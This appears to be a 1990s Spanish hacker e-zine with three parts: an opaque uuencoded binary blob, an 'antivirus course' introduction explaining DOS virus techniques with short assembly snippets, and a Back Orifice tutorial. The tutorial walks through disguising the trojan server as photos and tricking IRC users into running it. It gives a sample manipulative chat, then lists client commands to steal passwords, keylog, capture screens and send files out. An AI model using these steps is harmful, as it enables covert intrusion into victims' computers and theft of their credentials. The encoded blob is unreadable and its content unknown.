M[YYX5;*IQ9^,'T;?5%Z^;'6[%?2LN1]%KNDZ"[V[#@[VHP<)=S3L?@^2ER_3
M&'Y3KOB?!,6UJ9O5@T2Z/G6M1>Y'RB^>YK,R09B5`/PABG?;9HC[;
MHO[P:WST_L6[V'$I+,9,'5NF&3K81'KT).Y-KTXO,TM@QIA#])OEN*Z`%7]Y
MB9<(5Q=#\E'`C&`V-0C9#/JP*UEGOG/>%WJXP$F,^^G%/X6X:IM,KW>VK4[S_4W1NPXO^[=W1^Y_;;]_]_.KHOU&B[@8A/[UX_T)4[2#DUP^O
M)$TC3WV]S@9YQNR,#(EDY_SG-#`K8M^EHQ0H9NW"JIZ214YSV?O%O%[B1"S-
MXNQJ-&JKTZS26&S.2^XQ2^+A8Q^@"ZSH>(!]BC#<."_W498Kjumi)@1)I/?+W^_5#[%V86P*B;X=X:_
M^L*G@&1!0E1#]W.98?F7UL>E<0::F7YO/IQNQ0D@QA!S[#7.>:^92GL5L#WXFH.FM,U%?0\X*B)W,W@PF[KR+/
M>V=FUT/G+GCT05>AY"H!?764=@JZMR4?[SA=C;>W*^ONS?4?6&_L%33JHL!Q
MZL0X&Q7G2T%'Y;.9L52T#IGRSJWSB?K4H;2<73XXW3+;LMFZ-;_\.D+_Q?1_
MP3SU/9'*%18)8NMG02^T^.JVP4IT\(9=UQQJ!=!BW#9O,OBUR"8WV621S6ZR
M&?[?@`^.R2&-WKO.>H.L=S//>HMY_LT'#&6&?*ILC+]&Q*D*"8-06([O+P$N
MG2L,'0W'!0\GBNAT.9$Z/4-(C/;S7"1+DN^?NC>>JE<<6NY$QZ%TJ[F;
MXE@"@%T=I)3F")_4",LY:"W]F0`ZID6W>+[@V6BA_U4B&'J\
MK5XT3""!P;Q(:CI0GB7)K_*!;S'1LN'[Q5FRHGMKS'M%S'#`]<7!+B)W_8X#Y/+/3
MG#^H6O:E;#7M/=M.29ET>:*ZHS>^DSTX<3`/F"7.QFTLM(7
MWX5XQ@B]1I%4HYBXB:/C8XS%O"/6'#LI'?#1VY+&0U1J3V^+Q+\[>8V"M!K'
MNK%#C]'BL=YX7W_U5N.-.ZBE3OZ8COY@'QV.>[++P518H2QSH#CCH&[(1X9!
M?T3"'P$RC8E.]>CQ(0AS?%S'CNHG"VOS7V.*>[89FBI)D)%_/F`G;+`1T=$'
MSPT2%[S(B3L?.%EG+W2L:<%57W
M6M5`''GV[9)"78JM<^=0<::D!&'6CGX("\:KESL9M61>>F,A9XL\P-ILD>J8
M"A781HL_QW:%:M7M%8JB.59R\Z7+ZI3?L4LQ]Z3NR(\@K'WZ9$EM7T.BM<34
MG/174^/&VHQ#A+>;JI/JGJT[*MFSH]Q&'!7OP)&W]4:KL?8+-]NH;)=5:SBF
M`M`@%/2F[^1NT><':^RN4^ZVY18;PFUDWQX0?_(G45])@Z:UB>9NGCVAMSS(
M?GJRMSL*XKH6+?@-U`W24LBM[E/LY(7_JW32R]-S#_4Y8O!_WN)YP<5XRA
M<`U[*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]C#N-()&+F,'#S9YN;A$U.*8?8-G.B=+(TYX#5;K*2Y92TDN(`+0."C0
MROJF!5L+1PFS9U)K-T>FH$"](RVN^*8ECY1E[XBZHH@.G785Z'?(:C8UKM1O[J".?PXXO;1?>()U+J=G6CF%M!=!0+5N
M@JZ#D(8)&00AC_5&'EK98B+B*KTSO[VG=QK+>P?/YL6]$;9?FC(*6C_PO[9M
M'YKG*?67XD9;VCQV.!K/%'MH@HU
MH/\NG9LK[]^"_$D=("&T#B^8BZC;7NGV%Y_)`\'46`\:IECX37O5LXW`]FS
MCL[0L@6IO(+#R,Q%U[*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]H#>NE-",T,2,TLK>%9ZH-=^J3FC4<0P=-@K4S\:3*]MKKK$,V4B(>WFGHZPZ,).1E$H.AJ=C%%^RA#?O3:F_8IB5HI
M&3K>.T_[ZJ<6X6STX8J^E6;HO)Y.`I0!Q!NPLS>\X6#/M'@XN!2(K.<[DD7`
M!YT&3F>4VOAU1A^;PU%GMA-S1ZGG!/2)ENRF53BR70PAAY1].?AJ(73$"W'=
MQ^<4QZ!`),BR_Y`"YMCVP#[DP#B%;P)B>::@G@&1L\U8&4ZOC#/)33%U6(%C^`[$\O;U28B?2$$W4M`-%'2-?TUW0.Y8$IM9M,A3Y&)/
M40'Z%-V+/Q4B4,48U*HHE(M#N4B4@T69@[&/1QG8"1>.`E+.,U8O])8+*$>E
MHOMQ*>QS^![&RNR6Q0!5*4158/2R`*@J@:J*P*HRN*H$D8KN!;*4,UL&I"Q'
M->['3*(E>(LINQQ2N:_X$%:Q'.!*Q>M"$^$KX)4\P%(*L2P%64*8Q7*Y<(
MMCB#O'BT&7*-KN5:NQO+2.(A^%,<_>V&XLZ]?%+]?X7=$`G:S2Q1;*AX<]
M9AHENF6ERC6R-<[LOX_V1NZK0',TQK?SSDPH+O^W%^]>HVO#_?CH]=L/[V.Z
M0(96OG[Y`OT6J2J&F8>&SK-!!KM$ACV>.8=5L7%NK`>7),.3;V&RK^ZUD>FV
MT?^C?A,]XDY]X'Z[\_^WYA^M?]8_ZY]O][/F_W_?/VO^_YK_O^;_K_G_:_[_
8]_FSYO^O^?]K_O_WR___/Q&@"8``L```
`
end
sum -r/size 1846/11634
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
CURSO DE ANTIVIRUS
------------------
Primer capitulo: INTRODUCCION
******************************************************************************
Disposicion Legal:
El motivo del presente curso es instruir a aquel que lo siga en el
conocimiento de las tecnicas usadas para combatir virus, empezando por
las mas basicas para acabar en las ultimas novedades. Para ello
profundizare en el conocimiento del codigo virico con el unico
proposito de poner al lector en disposicion de saber a que nos
enfrentamos cuando luchamos contra esta lacra del mundo informatico.
La informacion contenida en el curso es informacion tecnica que puede
utilizarse en la fabricacion de un virus. De ahi que la responsabilidad
unica es del lector, y a su eleccion queda usar bien o mal la informacion
aqui relatada. Del mismo modo es su responsabilidad ejecutar cualquier
codigo aparecido en el curso en su propio ordenador o en el de
terceros, declinando yo toda responsabilidad por los posibles daos
causados.
Para evitar en la medida de lo posible el uso fraudulento de esta
informacion no dare en ningun momento el codigo completo de ningun
virus, sino solo rutinas sueltas. De ese modo la confeccion de un
virus a partir de las rutina mostradas en el curso es una labor que
requiere un esfuerzo por parte del lector y por tanto un delito
consciente.
> De ahi que yo, el autor, declino toda responsabilidad civil y/o legal
> que discurra de la utilizacion fraudulenta de esta informacion. El
> responsable unico y ultimo ser el lector si decide usarla para dichos
> fines.
El autor:
Manuel Llorens.
******************************************************************************
He creido conveniente comenzar el curso explicando cada una de las
preguntas de la encuesta, dada la variedad de respuestas que he
recibido. No me extender en aquellas que por su caracter meramente
tecnico pertenezcan mas al curso de ASM de Pablo Barron que al
presente.
Cada uno de los puntos se desarrollar a lo largo del curso alli donde
sea conveniente. Aun no he decidido el 'indice' del mismo, que ya
incluire en el proximo numero (es por esperar a tener el mayor numero
posible de encuestas)
> Sabes para lo que sirve una interrupcion?
Una interrupcion es el modo que tiene un programa ensamblador de
ejecutar servicios y funciones del BIOS (Basic Input Output System,
mas conocido como la ROM) y el DOS.
La mayoria de los virus 'interceptan' estas interrupciones de modo
que cada vez que se ejecuta uno de dichos servicios el virus supervisa
lo que esta haciendo el programa que ejecuto la interrupcion, a este
proceso se le denomina 'instalar un gestor de interrupcion'.
La instruccion ensamblador que ejecuta una interrupcion es
int numero_de_la_interrupcion.
La direccion de cada gestor de interrupcion (vector de interrupcion)
se guarda en una tabla a partir de la direccion 0000:0000, y cada
vector ocupa 4 bytes (seg:off).
> Sabes instalar un gestor de interrupcion?
Pues tan facil como esto:
mov ah,25h (servicio establecer vector de interrupcion)
mov al,interrupcion_a_capturar (entre 0 y 255)
lds dx,gestor_de_interrupcion (direccion de la rutina gestora)
int 21h (llama a la interrupcion del DOS)
Otro metodo que puede usarse si no se quiere llamar al DOS es el
siguiente:
xor ax,ax
mov ds,ax
mov bx,4*interrupcion_a_capturar
mov [bx],offset gestor_de_interrupcion
mov [bx+2],cs (si el gestor esta en el mismo segmento que el actual)
Generalmente es necesario guardar previamente el gestor de
interrupcion actual antes de cambiarlo por el nuestro con el fin de
volver a instalar en antiguo al salir del programa. Tambien
generalmente es necesario que nuestro propio gestor de interrupcion
llame al antiguo. Por ejemplo un virus captura la interrupcion 21h (la
del DOS) si 'detecta' que el programa que la ejecuto est intentando
abrir un fichero (mediante ah=3Dh) lo tratar de infectar y finalmente
dejar que el DOS lo abra, llamando al gestor de interrupcion antiguo.
Igualmente si la funcion que el programa ejecuta no es util a nuestro
virus la dejara pasar al DOS 'intacta'.
> Conoces la forma en la que arranca el DOS?
El proceso difiere ligeramente segun se arranque desde el HD o desde
un disquete, pero basicamente a grandes rasgos es el que sigue:
Primero se ejecuta una rutina que reside en el MBR (ver mas abajo) que
se encarga de cargar el sector BOOT de la particion activa. Si se esta
arrancando desde un disquete el proceso es similar solo que no existe
MBR ni tabla de particion, ya que el sector BOOT siempre esta en la
misma posicion (el primero del disco). Se ejecuta el codigo contenido
en el BOOT. El BOOT carga IO.SYS e MSDOS.SYS a partir de 0070:0000 o
presenta un mensaje de error si el disco no era de arranque. A
continuacion ejecuta IO.SYS (una rutina contenida en el que se denomina
SYSINIT) el cual ejecuta a su vez MSDOS.SYS. Cuando MSDOS.SYS devuelve
el control a SYSINIT este carga el CONFIG.SYS lo procesa y al final
entrega el control a COMMAND.COM para que cargue el autoexec.bat
Este proceso de carga es muy importante dado que si un virus consigue
infectar el MBR o el BOOT toma el control del ordenador antes que
ningun otro programa. A partir de aqui tendremos en cuenta la
siguiente maxima del mundo de los virus:
"Toda porcion de codigo ejecutable es susceptible de ser infectada"
"Toda porcion de codigo no ejecutable puede ser infectada pero nunca
puede dar lugar por si sola a una infeccion" (por ejemplo un mensaje
nunca puede dar lugar a una infeccion, aunque si puede haber sido
infectado por un virus como modo de guardar en el sus datos).
> Sabes lo que es el DTA?
Es el Disk Transfer Address. Basicamente es una zona de memoria que se
crea al ejecutar cada programa y que sirve para que las funciones del
DOS devuelvan informacion al programa a traves de aquellas
interrupciones que no piden explicitamente una direccion de memoria.
Por ejemplo, cuando leemos un fichero en ASM mediante una interrupcion
le pasamos al DOS la direccion de memoria donde queremos que este meta
los datos leidos del fichero, pero cuando le pedimos que nos diga que
ficheros encuentra que coincidan con '*.COM' la respuesta es enviada
al DTA, ya que no le pasamos un direccion.
Por defecto se encuentra a partir del byte 80h del comienzo del
segmento del programa (ver diferencias entre un COM y un EXE) y es la
misma zona que usa el DOS para pasar los parametros de la linea de
comandos a un programa por lo que si vamos a usar la DTA deberemos
relocalizarla primero fuera de dicha zona o perderemos la informacion
sobre dichos parametros. Relocalizarla es tal facil como hacer:
mov ah,1ah
lds dx,direccion_del_nuevo_dta
int 21h
Lo normal es que el virus se cree su propio DTA para no interferir
con los parametros que se le hayan podido pasar al programa infectado
y luego restaura la DTA antes de salir.
> Sabes lo que es un MCB?
Memory Control Block. Es una zona de memoria que se encuentra justo
antes de cada bloque de memoria que reserva el DOS para uso de un
programa que indica cu nta memoria se ha reservado, por que programa y
cual es el siguiente bloque. De este modo un virus puede reservar
memoria para si mismo mediante la modificacion directa de estos MCBs.
> Sabes lo que es el MBR?
Es el Master Boot Record. Esta presente en el sector 0 de cada disco
duro, y contiene ademas de una porcion de codigo ejecutable la tabla de
particion. Puede crearse un MBR nuevo mediante la ejecucion de FDISK
/MBR, en caso de sospecharse que este pueda haber sido infectado.
Algunos discos duros de gran capacidad (>512 megas) instalan en el MBR
su propia rutina para poder engaar al DOS y hacerle creer que son
menores de lo que realmente son, ya que el DOS no puede trabajar con
discos de tamaos >512 megas, de ahi que debemos ser cuidadosos. En
cualquier caso, la destruccion del codigo ejecutable del MBR no es
demasiado peligrosa, ya que siempre podemos restaurarlo mediante el
FDISK o mediante las utilidades que nos entregaron con el HD, pero si
es m s peligroso destruir la tabla de particiones, ya que si no
recordamos los valores que contiene podriamos perder el acceso al disco
duro.
> Sabes lo que es un CRC?
Ciclyc Redundant Check. Es una forma de comprobar de forma univoca que
el contenido de un archivo no ha cambiado, mediante una operacion
matem tica que afecta a cada byte del archivo y genera un numero (de
generalmente 16 o 32 bytes) para cada archivo. Una vez obtenido este
numero las posibilidades de que una modificacion del archivo de el
mismo numero son pequeisimas. De ahi que haya sido un metodo
tradicionalmente muy utilizado por los antivirus para comprobar si el
programa habia sido modificado por un virus, guardando para cada
directorio un archivo con los CRCs de cada archivo del mismo y
comprobandolo periodicamente o al ejecutar cada archivo (en caso de un
antivirus residente o uno que modifique directamente el ejecutable para
que se auto chequee cada vez que se ejecute, lo cual ya no se usa porque
daba muchos problemas y falsas alarmas). Otro metodo de comprobar la
integridad de un archivo son los checksums o sumas de control que son
mucho mas sencillas y rapidas pero de menos fiabilidad. De hecho el
metodo de los CRCs es tan potente que muchos antivirus son capaces de
reconstruir el archivo antes de ser modificado a partir de la
informacion de estos. Esta tecnica a dejado de ser segura debido a la
aparicion de virus stealth (invisibles) que son capaces de hacer que
un archivo infectado aparezca a los ojos del programa que calcula el
CRC como estaba antes de infectarlo (ver m s adelante).
> Sabes en que se diferencia un COM de un EXE?
La diferencia principal es que un COM solo puede ocupar un segmento 64
K y un EXE puede ocupar toda la memoria por debajo de 1 mega (sin
contar que el programa este hecho en modo protegido). Pero para
nuestros fines la diferencia principal radica en la forma diferente que
tiene el DOS de cargar y ejecutar estos programas. Veamos como carga el
DOS un COM o un EXE.
Primero se crea un PSP (Program Segment Prefix) que ocupa los 100h
primeros bytes del segmento que ocupa el programa. El programa en si se
carga a partir de 100h. El PSP guarda alguna informacion sobre el
programa que se encuentra justo despus de el. Ademas como vimos
contiene a la DTA y/o a los par metros (por defecto). Si se trata de un
archivo COM el programa comienza a ejecutarse a partir de 100h, si se
trata de un EXE el programa se ejecuta a partir de los datos
especificados en la cabecera del mismos que son los primeros bytes del
archivo ejecutable. No debe confundirse el PSP con la cabecera de un
EXE. La cabecera de un EXE son los primeros bytes del archivo y el PSP
se crea para cualquier programa ejecutable en la memoria (COMs o EXEs).
En realidad existen otros programas ejecutables como son los
controladores de dispositivos (Device Drivers) que se instalan en el
config.sys o los cero code start, que son archivos que se ejecutan
antes de que se haya cargado el dos (IO.SYS y MSDOS.SYS por ejemplo).
En un COM por tanto el primer byte del archivo corresponde con el
primer byte que se ejecutar , en un EXE en cambio los primeros bytes
corresponden a una cabecera que principalmente ofrece informacion sobre
el punto de entrada al archivo, es decir, sobre el byte a partir del
cual se ejecutara dicho ejecutable. Ademas contiene la tabla de
relocalizacion que sirve para cambiar los saltos absolutos (los no
relativos) que contiene el EXE de modo que este pueda ejecutarse
independientemente de la direccion de memoria donde resida (para la
distincion entre saltos absolutos y relativos consultar el curse de ASM
de Pablo ;)
> Sabes hacer un programa residente?
Un programa residente TSR (Terminate and Stay Resident) es un programa
que al terminar su ejecucion no libera la memoria que le habia sido
asignada por el DOS, pero si devuelve el control a este. Sirven
generalmente para instalar rutinas en memoria, en la mayor parte de los
casos gestores de interrupcion. Para dejar un programa residente hay
dos metodos, el primero es mediante la modificacion de los MCBs y el
segundo mediante una llamada al DOS:
mov ah,31h
mov al,error_level
mov dx,tamao_de_la_porcion_residente a partir del PSP)
xor dx,4 (para pasar dx a p rrafos)
add dx,16 (para reservar espacio para los 100h bytes del PSP)
int 21h
Para conocer el tamao de la porcion residente lo mas conveniente es
poner una etiqueta donde comienza y otra donde acaba y hacer la resta
de ambas.
> Sabes programar un tracer (paso a paso)?
Un tracer es un rutina que pone la CPU en modo paso a paso es decir,
que cada vez ejecute una instruccion llamara a la int 1h. Existen
diversas tecnicas usadas por los virus y otros programas para evitar
que un tracer explore su codigo (armouring). Para evitar esto ultimo
hay que programar con mucho cuidado de modo que cada vez que se ejecuta
una instruccion miremos a la siguiente para ver si se trata de una
instruccion capciosa aunque es un proceso laborioso y dificil...
en general el procedimiento consiste en instalar un gestor de la
interrupcion 1 y activar el flag de paso a paso:
pushf
pop ax
or ax,100h
push ax
popf
Un tracer es muy util cuando queremos supervisar la ejecucion de un
programa de forma autom tica. Los virus usan esta tcnica para labores
de tunneling (ver m s adelante).
> Sabes usar algun debugger?
Un debugger es como un tracer pero con control en tiempo real por
parte del usuario. Es muy recomendable tener uno a mano para pillar los
bugs que derivan de la programacion de antivirus ;)
> Sabes la diferencia entre un virus y un troyano?
Un virus es una porcion de codigo ejecutable que se aade a otra ya
existente. Los virus se ejecutan sin intencion por parte del usuario,
que no sabe que el programa en cuestion contiene un virus. Un troyano
es un programa con entidad propia que generalmente se construye para
labores destructivas. Es el usuario el que confiando en el programa lo
ejecuta creyendo que se trata de un programa de algun otro tipo.
> Sabes como se produce la infeccion de un archivo?
El virus modifica el programa a infectar de tal modo que se ejecute su
codigo en vez del codigo del programa original. Salvo los virus de
enlace todos los virus necesitan modificar el programa original.
> Sabes lo que es un virus 'stealth'?
Es un virus que mediante algunas tcnicas consigue ocultar su
existencia a los antivirus y en general al DOS. Para ello necesita
estar residente antes que los antivirus. Modifica la informacion que
los antivirus obtiene de modo que parezca que el archivo es normal.
Para ello existen diversos mtodos, ya que son diversos los mtodos que
el DOS usa para manejar archivos. Principalmente son el trabajo fisico
con el disco (a base de leer sectores), los FCBs (mtodo obsoleto), y
la apertura del archivo mediante handles (mtodo vigente).
> Sabes lo que es un 'handle stealth'?
Es un virus que utiliza tcnicas stealth de modo que cada vez que un
programa abre un handle para leer/escribir un archivo, modifica los
datos del handle para que parezca que el programa es normal. Es decir,
aunque el programa sigue estando infectado no es posible ver el
verdadero programa sino solo la copia sin infectar que nos muestra el
virus.
> Sabes lo que es un 'infector/disinfector'?
Es justo la tcnica contraria, cuando el virus advierte que se est
abriendo un programa infectado lo desinfecta y solo vuelva a infectarlo
cuando el archivo es cerrado. Es un mtodo m s sencillo de implementar
que el 'handle stealth'.
> Sabes lo que es un virus con 'tunneling?
Cuando un antivirus queda residente instala sus propios gestores de
interrupcion para interrupciones que puedan serle utiles a un virus. De
ese modo puede dar la alarma cuando un virus efectue una operacion
extraa a travs de una de estas interrupciones. Un virus con tunneling
intenta averiguar la direccion de los gestores de interrupcion del DOS
antes de que quedara residente el antivirus. Esto es posible porque
como dijimos con anterioridad, el antivirus tiene que devolver el
control a los gestores del DOS en algun momento para permitir que el
DOS haga su trabajo. Las tcnicas principalmente son dos: hacer un
tracing, o buscar saltos a lo largo del codigo del gestor del antivirus
que salten al DOS. Para ello necesitan conocer el segmento del DOS, lo
cual se hace a travs de una interrupcion indocumentada del DOS. En
realidad son mtodos poco fiables dado que son bastante evidentes y a
veces condenados al fracaso. Muchos antivirus residentes averiguan que
un virus les est haciendo un tunneling y lo detiene. Cuando desarrolle
el tema expondr algunas tcnicas que he descubierto hace poco, que
subsanan la mayoria de los problemas de los tunneling tradicionales.
Aunque hasta la fecha ningun virus las incorpora, es bueno anticiparse
a los fallos del DOS y taparlos antes de que esto ocurra, de ahi mi
inters por esta tcnica ;)
Otras tcnicas se basan en el acceso al disco directamente a travs
de los puertos, es decir sin necesidad de llamar a ninguna
interrupcion. Este mtodo presenta el inconveniente de que no siempre
funciona, por lo que es poco probable que un virus lo incorpore.
> Sabes lo que es un virus polimorfico?
Es un virus que modifica su apariencia en cada infeccion. Esto lo
consigue encript ndose con una clave diferente en cada copia que hace
de si mismo. Esto dificulta mucho las labores de busqueda de cadenas
por parte de los antivirus, que solo pueden fijarse en las rutinas de
desencriptacion o utilizar tcnicas de otro tipo. Para dificultar aun
m s la busqueda de cadenas un virus realmente polimorfico debe variar
tambin la apariencia de su rutina de desencriptacion, mediante la
insercion de NOPs aleatorios (instruccion ASM que no hace nada) y
mediante la utilizacion de distintos registros y loops para realizar la
desencriptacion. Se ha popularizado para este fin la realizacion de
motores de encriptacion que son rutinas que desarrollan estas tcnicas
de un modo general y que se aaden a un virus ya completo que no
incluia polimorfismo.
> Sabes lo que es un virus con 'armouring'?
Es un virus que utiliza tcnicas para dificultar ser desensamblado o
traceado. No tienen otro fin que este, pero dado que generalmente
cuesta muy poco realizarlas es bastante popular que un virus las
incluya, aunque tambin pueden dar lugar a que un antivirus heuristico
lo detecte. Ultimamente tambin se han popularizado tcnicas de
armouring que actuan contra un antivirus especifico, evitando las
combinaciones de bytes que se conoce que activan la alarma heuristica o
desactivando el antivirus residente en memoria (mal llamado tunneling).
> Has hecho alguna vez un virus?
Hacer un virus es una cosa divertida, con la cual se aprende mucho,
pero que est penada por la ley. Es mejor combatir esta lacra
estudiando a fondo sus tcnicas y evit ndolas, intentando siempre ir un
paso por delante de los desarrolladores de virus.
> Sabes infectar COMs?
La infeccion de un COM se hace generalmente modificando los primeros
bytes de modo que la ejecucion comience por la rutina virica que se
aade al programa original a partir de su fin (virus appending). Despus
de la ejecucion del virus se restaura en memoria los 3 primeros bytes
del archivo original y se le ejecuta. De este modo el usuario no nota
que el programa est infectado. Otro mtodo cada vez m s en desuso es
el de sobreescribir el codigo original del programa (virus
overwritting). De este modo el programa original no puede ser ejecutado
y el virus se delata con facilidad. Por supuesto puede insertarse el
codigo del virus al principio, pero es una tcnica que no se usa
demasiado.
> Sabes infectar EXEs?
La infeccion de un EXE por el contrario no precisa de la modificacion
del programa original. Se aade el codigo al final y se modifica la
cabecera del EXE de tal modo que el punto de entrada cambie a la rutina
virica, que despus cede el control al punto de entrada original.
Tambin se usan tcnicas como insertar el codigo del virus en el stack
del EXE (zona 'hueca' que puede o no estar presente en el archivo).
> Sabes lo que es un virus de enlace?
Es una modalidad de virus que no precisa modificar el archivo que
infecta. Para ello lo que hace es modificar la FAT de modo que el
comienzo del archivo siempre apunte a un sector que contiene el virus.
Se ejecuta este y carga el programa original. No son muy populares dado
que precisan de un mayor trabajo y no son en general f ciles de
detectar.
> Sabes como funciona una busqueda heuristica?
Ya la he mencionado numerosas veces en el texto. Es una tcnica
antivirus que evita la busqueda de cadenas. Para ello lo que hace es
desensamblar el programa y ejecutarlo paso a paso, a veces mediante la
propia CPU, a veces mediante una emulacion. De ese modo averigua qu
hace exactamente el programa en estudio e informa al usuario.
Generalmente es dificil de implementar de un modo autom tica ya que se
desconoce el conocimiento del usuario. Esto da lugar a un compromiso
entre potencia del mtodo y falsas alarmas. En general es una buena
tcnica si se implementa bien y el usuario tiene un alto conocimiento
tcnico. La mayoria de los virus nuevos evitan directamente la busqueda
heuristica modificando los algoritmos hasta que el programa antivirus
no es capaz de indentificarlos.
Bueno pues esto es todo por hoy. No es que vay is a aprender nada nuevo
pero quedan sentados unos conocimientos b sicos y un lenguaje a
utilizar en el resto del curso. Preguntas... ya sabis las que quer is
;)
Existen muchos puntos que no est n suficientemente detallados, cuando
sea necesario desarrollar cada uno, asi que no me preguntis sobre eso
a raiz de esta introduccion, esperad a que llegue a ese capitulo ;)
Patuel.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Back Orifice
Redactora jefe:
Barbwired
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Colaboradores:
FREEDOM
Este texto pretende explicar de forma clara y concisa el uso del
BO en w95 y las posibles aplicaciones que se le pueden dar en IRC.
De ningun modo se pretende incitar a la ilegalidad y este documento se
redacta con fines educativos, para la investigacion y prevencion del ataque.
0 - Que es el BO?
Se trata de un troyano que se aprovecha vilmente de los bugs de seguridad
de w95/98. NO tengo constancia de su funcionamiento en NT. Quien consiga
colarle el bo a un incauto, tendra acceso a todo su sistema: Disco duro,
cdrom, disketera, y por supuesto a sus archivos y directorios, pudiendo
borrarlos o modificarlos, bajarlos a su propio disco duro...
(No seamos malos).
1 - Donde conseguir este magnifico exploit?
BO se puede conseguir en las siguientes direcciones:
www.members.xoom.com/lynx/ en la zona de download (descarga).
http://www.cultdeadcow.com/
Para una mayor informacion se recomienda visitar:
www.rootshell.com/
2 - Ya tengo el Bo.zip, Que contiene?
El bo.zip o bo120.zip consta de una serie de archivos:
bo.txt Oscuro documento explicativo. No se entiende mucho.
plugin.txt Traducido en el epigrafe Apendice de este doc.
boserve.exe El servidor autoinstalable del BO
bogui.exe Cliente gui del BO
boclient.exe Cliente en modo texto del BO
boconfig.exe Utilidad de configuracion y plugin del server de BO
melt.exe Descompresor de archivos comprimidos con el comando freeze
freeze.exe Compresor de archivos. SE pueden descomprimir con melt.
3 - Que hacer con todos estos archivos?
Para que todo funcione correctamente debes saber que BAJO NINGUN CONCEPTO
debes ejecutar boserve.exe, pues te haria sensible al ataque.
Lo primero que hay que hacer es averiguar la ip del pardillo. Despues hay que
meterle como sea el archivo boserve.exe. Y conseguir que lo ejecute. Aqui
entra en juego la imaginacion de cada uno. El campo ideal de accion es el
IRC. Aqui los pobres chateros de a pie hablan a sus anchas, desconocedores
del peligro que les acecha.
4- Como le meto el BO al pardillo?
Hay que elegir una vicima que trabaje bajo windows. Todos sabemos que eso es
facil de averiguar en IRC.
Truco facil y muy visto, por tanto poco efectivo: renombrar boserve.exe
a fotos.exe. Si ya tienes algo de confianza con la victima en cuestion lo
aceptara sin mayores problemas. Para gente mas desconfiada, intenta colarselo
despues de hacerte tu el desconfiado:
En el canal #intercambio_de_fotos_guarras_muy_fuertes:
Elite: Que tienes para cambiar?
Pardillo: un par de fotos de Barbwired, que esta tremenda.
E: Pero estas seguro de que es Barb de verdad?, que si no no te mando
nada, que ya me la han querido liar...
P: De verdad, que me las acabo de bajar de Playboy!
E: Vale, pues te mando yo una de Barbwired que tb esta muy buena.
P: Anda! Barbwired, a mi me pone toda la pila... Uf!!!
... etc, etc, etc....
Y luego le dices que tienes un ejecutable, que es una animacion de Barbwired
con su novia (todos sabemos que Barb es bisexual). XDDD Asi te llevas por el
morro unas cuantas fotos de Barbwired y encima le cuelas el boserve.exe.
Cuando nuestro amigo Pardillo ejecute la animacion y vea que no sale Barb por
ningun lado se va a coger un cabreo de narices, y con razon. Te disculpas
como buenamente puedas y le dices que el fichero esta defectuoso y que te lo
vas a volver a bajar. Lo que te apetezca, pero queda bien con el tio, para
que no se corra la voz y sigan confiando en ti y en tus fotos guarras. Es
conveniente hacerselo a varios a la vez en privado, para tener un buen numero
de victimas. Con la excusa de volvertelo a bajar, te sales de Irc.
Vuelves a entrar con otro nick y a trabajar.
5 - Como accedo al ordenador del Pardillo?
Pasos a seguir:
a) Copiar boclient.exe en tu directorio raiz, c:\
b) Abrir una ventana de msdos en w95
c) Resolver la ip de la victima. Facil de hacer en IRC. Si quieres le das
conversacion para que no se vaya.
d) En la ventana de msdos, desde la linea de comandos ejecutar boclient.exe
a continuacion teclea host "IPdelPardillo", sin comillas.
e) En teoria ya estas dentro.
6 - Que puedo hacer una vez dentro?
Puedes hacer maravillas. Pero por algo hay que empezar:
Desde bo tecleas dir. Te mostrara los archivos de su HD.
Si tecleas passes te saldran cosas interesantes, osea, algunas passwords.
Puedes teclear cd directorio para explorar. Como en MsDos.
Facil.
Cosas bonitas para "perfeccionistas"
Puedes abrirle el puerto http y ver su disco duro comodamente con tu
navegador (A ver si soy capaz de hacerme entender):
Una vez dentro tienes que teclear httpon 80, o sea activar el http y el
puerto. Si por ejemplo tiene conectado el http con otra cosa, se lo cierras
primero con httpoff y el puerto que tenga abierto. Pero, como sabes el
puerto que tiene abierto? un scaneado? Ejecutas el httpon y te dice el
estado del http y el puerto es decir, le cierras los puertos que tenga
abiertos y luego le abres el 80.
Mas comandos (traducido de la documentacion que acompaa al BO):
Recuerda que en todo momento hablamos del cliente de texto, el boclient.exe.
appadd Lanza una aplicacion de texto en un puerto tcp. Para controlar una
aplicacion dos o de texto (como el command.com) via telnet.
appdel evita que una aplicacion oiga las conexiones.
applist Da un listado de las aplicaciones que escuchan la conexion en ese
momento.
md Crea un directorio.
dir muestra los archivos y directorios.
rd Borra un directorio.
shareadd Crea un export en el servidor.
sharedel Borra un export.
copy Copia archivos.
del Borra archivos.
find Busca en el arbol los archivos.
freeze Comprime un archivo
melt Descomprime un archivo comprimido con freeze.
view Visor del contenido de un archivo.
httpoff Cierra el servidor http.
httpon Abre el servidor http.
keylog Logea las teclas que se aprietan en el servidor (victima) a un
archivo de texto. El log muestra el nombre de la ventana en que
se tecleo el texto.
keylog stopend Acaba el log de teclado.
capavi Captura video y audio de un dispositivo a un archivo .avi
capscreen Captura una imagen de la pantalla del server a formato .bmp
listcaps da un listado de los dispositivos de entrada de video.
sound ejecuta un archivo de sonido en el servidor (Te lo imaginas?).
netlist Listado de las conexiones de red.
netdisconnect Desconecta el servidor de una red.
netconnect Conecta el servidor a una red.
netview Ve todas las interfaces de red, servidores, dominios .
ping Hace ping al host. Da el nombre del host y la version del vo.
pluginexec Ejecuta un plugin para BO.
pluginkill Cierra el plugin.
pluginlist Da un listado de los plugin activos.
prockill Finaliza un proceso.
proclist Listado de los procesos en curso.
procspawn Ejecuta un programa.
rediradd Redirecciona los paquetes ip entrantes a otra ip
redirdel Para el redireccionamiento.
redirlist Listado de puertos de rediccionamiento activos
regmakekey Crea una entrada en el registro
regdelkey Borra una entrada en el registro.
regdelval Borra un valor del registro.
reglistkeys Listado sub llaves de una llave del registro
reglistvals Listado de los valores de una llave del registro
regsetval establece el valor de una llave del registro
resolve resuelve la direccion ip del server
dialog Crea un cuadro de dialogo con el texto que quieras y el boton ok
info Da la informacion completa del server
lockup cierra el server
passes Muestra las contraseas del usuario actual y la del salvapantallas.
Pueden contener basura al final.
reboot Apaga el server y lo reinicia. XDDD
tcprecv Conecta el server a una ip concreta y guarda la data recivida de esa
conexion al archivo especificado.
tcpsend conecta el server a una ip, manda el contenido del archivo
